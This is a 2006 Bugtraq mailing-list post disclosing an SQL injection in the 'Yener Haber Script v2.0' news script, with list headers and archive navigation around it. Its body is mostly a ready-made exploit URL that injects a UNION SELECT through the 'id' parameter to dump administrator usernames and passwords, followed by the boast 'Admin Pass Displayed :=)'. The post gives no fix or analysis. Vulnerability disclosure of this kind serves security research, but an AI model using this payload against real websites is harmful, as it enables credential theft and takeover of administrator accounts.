Yener Haber Script v2.0 SQL injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Yener Haber Script v2.0 SQL injection
From: dj_remix_20@xxxxxxxxxxx
Date: 4 Oct 2006 10:16:25 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# BiyoSecurity.Org

# script name : Yener Haber Script v2.0

# Demo : http://www50.brinkster.com/yenerturk

# Risk : High

# Regards : Dj_ReMix

# Thanks : Korsan , Liz0zim , TR_IP

# Exploit :

http://victim.com/?x=2&kategori=11&id=-1%20union+select+id,kullanici_adi,sifre,4,5,6,7,8,9+from+admin

Admin Pass Displayed :=)

Prev by Date: Directory Traversal Vulnerability in Goop Gallery 2.0.2
Next by Date: Technical Paper on the ZERT Patch and VML [was: Re: ZERT patch for setSlice()]
Previous by thread: Re: Directory Traversal Vulnerability in Goop Gallery 2.0.2
Next by thread: Technical Paper on the ZERT Patch and VML [was: Re: ZERT patch for setSlice()]
Index(es):
- Date
- Thread